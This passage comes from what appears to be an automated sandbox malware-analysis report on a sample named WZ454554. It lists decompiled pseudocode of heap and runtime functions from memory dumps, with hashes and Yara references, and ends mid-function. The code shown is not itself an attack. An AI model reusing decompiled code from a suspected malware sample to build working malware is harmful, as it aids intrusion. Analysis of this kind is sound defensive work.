                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80982eea5c691a02104fcdd9c842dd957947ff33e76c5db9413b2748b8178043
                            • Instruction ID: f3bfd634b291df8ff7d70a58992af8bdac1dc50e3906fa773053b12085f03ae9
                            • Opcode Fuzzy Hash: 80982eea5c691a02104fcdd9c842dd957947ff33e76c5db9413b2748b8178043
                            • Instruction Fuzzy Hash: 4F817D71D0024A9FDB18CF59D490BBAFBF1FB58304F6481AAE845AB281D3789C81DF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B7DBD2, Relevance: .2, Instructions: 212COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00B7DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0xba6114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L00B7D016(_t119, _t183, _t119, _t78);
									L00ACFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										L00B7C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0xa9aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										L00ACFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E00B7E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0xa9aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = L00AFD340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E00B7D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E00B7D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E00B7A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                            0x00b7dbdc
                            0x00b7dbde
                            0x00b7dbe1
                            0x00b7dbed
                            0x00b7dbef
                            0x00b7dbf7
                            0x00b7dbfd
                            0x00b7dc00
                            0x00b7dc04
                            0x00b7dc07
                            0x00b7dc0c
                            0x00b7dd1f
                            0x00b7dd1f
                            0x00b7dd23
                            0x00b7dd26
                            0x00b7dd29
                            0x00b7dd29
                            0x00b7dd2c
                            0x00b7dd32
                            0x00b7dd35
                            0x00000000
                            0x00b7dd38
                            0x00b7dd3a
                            0x00b7dd5d
                            0x00b7dd63
                            0x00b7dd69
                            0x00b7dd6e
                            0x00b7dd71
                            0x00b7dd78
                            0x00b7dd7d
                            0x00b7dd8c
                            0x00b7dd9e
                            0x00b7dda0
                            0x00b7ddad
                            0x00b7ddb0
                            0x00b7ddb5
                            0x00b7ddb9
                            0x00b7ddd9
                            0x00b7ddd9
                            0x00b7ddde
                            0x00b7dde0
                            0x00b7dde3
                            0x00b7dde5
                            0x00b7dde9
                            0x00b7dde9
                            0x00b7ddee
                            0x00b7ddf6
                            0x00b7ddf6
                            0x00b7dd97
                            0x00000000
                            0x00000000
                            0x00b7dd9b
                            0x00000000
                            0x00b7dd9b
                            0x00b7dd7f
                            0x00000000
                            0x00b7dd7f
                            0x00b7dd3f
                            0x00b7dd54
                            0x00b7dd58
                            0x00b7dd86
                            0x00000000
                            0x00b7dd86
                            0x00000000
                            0x00b7dd5a
                            0x00b7dd5a
                            0x00b7dd5a
                            0x00000000
                            0x00b7dd5a
                            0x00b7dd3f
                            0x00b7dd38
                            0x00b7dc12
                            0x00b7dc15
                            0x00b7dc25
                            0x00b7dc31
                            0x00b7dc34
                            0x00b7dc3b
                            0x00b7dc3e
                            0x00b7dc40
                            0x00b7dc43
                            0x00b7dc46
                            0x00b7dc62
                            0x00b7dc6b
                            0x00b7dc6d
                            0x00b7dc48
                            0x00b7dc4b
                            0x00b7dc59
                            0x00b7dc5c
                            0x00b7dc5c
                            0x00b7dc72
                            0x00b7dc78
                            0x00b7dc7f
                            0x00b7dc81
                            0x00b7dc81
                            0x00b7dc84
                            0x00b7dc88
                            0x00b7dc8d
                            0x00b7dc95
                            0x00b7dc9b
                            0x00b7dca0
                            0x00b7dca2
                            0x00b7dca6
                            0x00b7dca6
                            0x00b7dcb0
                            0x00b7dcd1
                            0x00b7dcd4
                            0x00b7dcda
                            0x00b7dcec
                            0x00b7dcf1
                            0x00b7dcf6
                            0x00b7dd0c
                            0x00b7dd1a
                            0x00b7dd1a
                            0x00b7dcf6
                            0x00000000
                            0x00b7dcda
                            0x00b7dcb5
                            0x00b7dcb6
                            0x00b7dcc5
                            0x00b7dcca
                            0x00b7dcca

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 03cbebf1b52c17882ab20052291472aa9577f94d352c3aec23849af4dc76c361
                            • Instruction ID: 1c2c257acddcaea10bfc0b4c6036245b2212fc305d09532e43d7e83c1d5cc579
                            • Opcode Fuzzy Hash: 03cbebf1b52c17882ab20052291472aa9577f94d352c3aec23849af4dc76c361
                            • Instruction Fuzzy Hash: 8A710A75E001299FCF24DF69C880ABEB7F1EF88350B1581A9E869EB345D634DD41DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B828EC, Relevance: .2, Instructions: 211COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E00B828EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E00AD2280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0xba6110; // 0x2f755769
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0xba6110; // 0x2f755769
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = L00B825DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												L00ACFFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0xba6110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												L00B82506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												L00ACFFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E00AFFA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E00B7A80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								L00ACFFB0(_t115, _t145, _t147);
							}
							_t104 = E00B83149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E00AD2280(_t104, _t147);
								}
								_v5 = 0xff;
								E00B82876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}











































                            0x00b828f5
                            0x00b828fa
                            0x00b828fe
                            0x00b82900
                            0x00b82906
                            0x00b82908
                            0x00b82908
                            0x00b8290e
                            0x00b82915
                            0x00b82918
                            0x00b8291b
                            0x00b8291d
                            0x00b82920
                            0x00b82920
                            0x00b82929
                            0x00b8292c
                            0x00b8292f
                            0x00b82932
                            0x00b82935
                            0x00b82938
                            0x00b8293d
                            0x00b8293d
                            0x00b82940
                            0x00b82944
                            0x00b82944
                            0x00b82948
                            0x00b8294a
                            0x00b82950
                            0x00b82953
                            0x00b82958
                            0x00000000
                            0x00000000
                            0x00b8295a
                            0x00b82962
                            0x00b82965
                            0x00b82976
                            0x00b82978
                            0x00b829e0
                            0x00b829e4
                            0x00b829e6
                            0x00b829e8
                            0x00b829eb
                            0x00b82993
                            0x00b82993
                            0x00000000
                            0x00b82993
                            0x00b829ed
                            0x00b829ef
                            0x00000000
                            0x00000000
                            0x00b829f1
                            0x00000000
                            0x00b829f1
                            0x00b8297a
                            0x00b8299b
                            0x00b8299d
                            0x00b829f5
                            0x00b829fb
                            0x00b829fb
                            0x00b82a00
                            0x00b82a04
                            0x00b82a04
                            0x00b82a06
                            0x00b82a13
                            0x00b82a13
                            0x00b82a18
                            0x00b82a44
                            0x00b82a44
                            0x00b82a44
                            0x00b82a46
                            0x00b82a50
                            0x00b82a5a
                            0x00b82a5e
                            0x00b82a99
                            0x00b82a9e
                            0x00b82aa0
                            0x00b82a70
                            0x00b82a70
                            0x00b82a72
                            0x00b82a75
                            0x00b82a82
                            0x00b82a89
                            0x00b82a89
                            0x00b82a7a
                            0x00b82a7f
                            0x00b82a7f
                            0x00b82a7f
                            0x00000000
                            0x00b82a7f
                            0x00b82aa4
                            0x00b82aa4
                            0x00b82ab6
                            0x00b82abd
                            0x00b82ac0
                            0x00b82ac4
                            0x00b82ac6
                            0x00b82ac9
                            0x00b82acf
                            0x00b82ad1
                            0x00b82ad3
                            0x00b82ad3
                            0x00b82ad3
                            0x00b82acf
                            0x00b82ad6
                            0x00b82ad9
                            0x00b82adb
                            0x00b82add
                            0x00b82af9
                            0x00b82af9
                            0x00b82aff
                            0x00b82adf
                            0x00b82adf
                            0x00b82ae7
                            0x00b82aea
                            0x00b82aef
                            0x00b82af4
                            0x00b82af4
                            0x00b82b01
                            0x00b82b05
                            0x00b82b08
                            0x00b82b08
                            0x00b82b0d
                            0x00b82b11
                            0x00b82b1b
                            0x00b82b20
                            0x00000000
                            0x00b82b11
                            0x00b82a60
                            0x00b82a61
                            0x00b82a6b
                            0x00000000
                            0x00b82a6b
                            0x00b82a1f
                            0x00b82a25
                            0x00b82a25
                            0x00b82a27
                            0x00b82a38
                            0x00b82a3d
                            0x00b82a3d
                            0x00b82a3f
                            0x00b82a3f
                            0x00000000
                            0x00b82a3f
                            0x00b82a2c
                            0x00b82a2c
                            0x00b82a31
                            0x00000000
                            0x00000000
                            0x00b82a36
                            0x00b82a36
                            0x00000000
                            0x00b82a36
                            0x00b82a0c
                            0x00000000
                            0x00b82a0c
                            0x00b829a1
                            0x00b829a4
                            0x00b829a4
                            0x00b829b0
                            0x00b829b5
                            0x00b829b9
                            0x00000000
                            0x00b829bf
                            0x00b829c3
                            0x00b829c6
                            0x00b829c6
                            0x00b829cd
                            0x00b829d3
                            0x00b829d8
                            0x00000000
                            0x00b829d8
                            0x00b829b9
                            0x00b82980
                            0x00b82983
                            0x00b82990
                            0x00000000
                            0x00b82989
                            0x00b82989
                            0x00b8298c
                            0x00b8298c
                            0x00b82995
                            0x00b82995
                            0x00b82999
                            0x00b82999
                            0x00000000
                            0x00b82999

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c62af8c1dad9eee833c9ae4d8edcd830fa88d5a127aac9ca2b9bc48aee0478b6
                            • Instruction ID: 71c43aefc75901ce8ad75ff024c7ec2a340af373c31bee65706753e7c672d73b
                            • Opcode Fuzzy Hash: c62af8c1dad9eee833c9ae4d8edcd830fa88d5a127aac9ca2b9bc48aee0478b6
                            • Instruction Fuzzy Hash: B371A371A0010A9FCB19EF69C8817BEB7E6EF58310F1485B9E855D72A1DB34DE41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B4B8D0, Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            C-Code - Quality: 39%
                            			E00B4B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0xba7b9c; // 0x0
				_t124 = L00AD4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00AF9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									L00AF95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00AF95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00AD77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00AF9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00AF95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0xba7b9c; // 0x0
									_t92 = L00AD4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00AF9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L00ABA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L00B4E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L00B4E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						L00AF95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                            0x00b4b8d9
                            0x00b4b8e4
                            0x00000000
                            0x00b4b8e6
                            0x00b4b8f3
                            0x00b4b8f5
                            0x00b4b8f5
                            0x00b4b8f8
                            0x00b4b920
                            0x00b4b924
                            0x00b4b936
                            0x00b4b939
                            0x00b4b93d
                            0x00b4b948
                            0x00b4b9a0
                            0x00b4b9a0
                            0x00b4b9a4
                            0x00b4b9bf
                            0x00b4b9c4
                            0x00b4b9c6
                            0x00b4b9cd
                            0x00b4b9d1
                            0x00b4bad4
                            0x00b4bad8
                            0x00b4bada
                            0x00b4badc
                            0x00b4badc
                            0x00b4badf
                            0x00b4bae0
                            0x00b4bae2
                            0x00b4bae4
                            0x00b4baec
                            0x00b4baee
                            0x00b4baf0
                            0x00b4baf0
                            0x00b4baec
                            0x00b4bafb
                            0x00b4bafc
                            0x00b4bafe
                            0x00b4bb01
                            0x00b4bb01
                            0x00000000
                            0x00b4bb06
                            0x00b4b9d7
                            0x00b4b9db
                            0x00b4b9db
                            0x00b4b9de
                            0x00b4b9de
                            0x00b4b9e4
                            0x00b4b9e7
                            0x00b4b9ea
                            0x00b4b9ec
                            0x00b4b9ef
                            0x00b4b9f3
                            0x00b4ba1b
                            0x00b4ba1b
                            0x00b4ba23
                            0x00b4ba24
                            0x00b4ba27
                            0x00b4ba2a
                            0x00b4ba2b
                            0x00b4ba2e
                            0x00b4ba30
                            0x00b4ba37
                            0x00b4ba3f
                            0x00b4ba9c
                            0x00b4baa2
                            0x00b4bb13
                            0x00b4bb15
                            0x00b4baae
                            0x00b4baae
                            0x00b4bab3
                            0x00b4bab5
                            0x00b4baba
                            0x00b4bac8
                            0x00b4bac8
                            0x00b4baba
                            0x00b4bacd
                            0x00b4bacf
                            0x00000000
                            0x00b4bacf
                            0x00b4bb1a
                            0x00000000
                            0x00b4bb1c
                            0x00b4baa7
                            0x00b4bb11
                            0x00000000
                            0x00b4bb11
                            0x00b4baa9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b4ba41
                            0x00b4ba41
                            0x00b4ba41
                            0x00b4ba58
                            0x00b4ba5d
                            0x00b4ba62
                            0x00000000
                            0x00000000
                            0x00b4ba64
                            0x00b4ba67
                            0x00b4ba68
                            0x00b4ba69
                            0x00b4ba6c
                            0x00b4ba6f
                            0x00b4ba71
                            0x00b4ba78
                            0x00b4ba80
                            0x00000000
                            0x00000000
                            0x00b4ba90
                            0x00b4ba90
                            0x00b4ba97
                            0x00000000
                            0x00b4ba97
                            0x00b4b9f5
                            0x00b4b9f7
                            0x00b4b9f7
                            0x00b4b9fa
                            0x00b4ba03
                            0x00b4ba07
                            0x00b4ba0c
                            0x00b4ba10
                            0x00b4ba17
                            0x00000000
                            0x00b4b9f7
                            0x00b4b9a6
                            0x00b4b9a8
                            0x00b4b9af
                            0x00b4b9b3
                            0x00000000
                            0x00000000
                            0x00b4b9b9
                            0x00000000
                            0x00b4b9b9
                            0x00b4b94d
                            0x00b4b98f
                            0x00b4b995
                            0x00b4b999
                            0x00b4b960
                            0x00b4b967
                            0x00b4b968
                            0x00b4b96a
                            0x00000000
                            0x00b4b96a
                            0x00b4b99b
                            0x00b4b99e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b4b99e
                            0x00b4b951
                            0x00b4b954
                            0x00b4b95a
                            0x00b4b95e
                            0x00b4b972
                            0x00b4b979
                            0x00b4b97d
                            0x00b4b97f
                            0x00b4b980
                            0x00b4b982
                            0x00b4b984
                            0x00000000
                            0x00b4b984
                            0x00000000
                            0x00b4b926
                            0x00000000
                            0x00b4b926

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6937c24f5428139009a705676b96d82030b807ca9a014624cdfb9895e25cff7
                            • Instruction ID: b06675b6e1b2aed16d30933ddb91215ce98e11a180901f6a5922066c26f0ec2f
                            • Opcode Fuzzy Hash: d6937c24f5428139009a705676b96d82030b807ca9a014624cdfb9895e25cff7
                            • Instruction Fuzzy Hash: 2271F032200705AFDB31CF24C985F66B7F5EB44720F244968F7568B2A1DB75EA44EB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041D583, Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55bdc44cf325239dafb64d429a8d78fbbc762f2e47bba8ec058bab1b20f42b8d
                            • Instruction ID: 5e17c7d82d1009a5ac7dfe302e354fffa88fd45d4f5181b146ae04da2155dc8a
                            • Opcode Fuzzy Hash: 55bdc44cf325239dafb64d429a8d78fbbc762f2e47bba8ec058bab1b20f42b8d
                            • Instruction Fuzzy Hash: 8DA16272A58795CFC716CF38DC8AA453BB6F342320748439EC8A1935E6D7311066CF8A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B71002, Relevance: .2, Instructions: 198COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00B71002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
